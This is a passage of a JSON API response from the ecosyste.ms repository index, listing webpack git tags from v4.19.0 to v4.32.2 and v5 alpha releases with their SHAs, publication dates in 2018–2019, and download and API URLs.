v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"p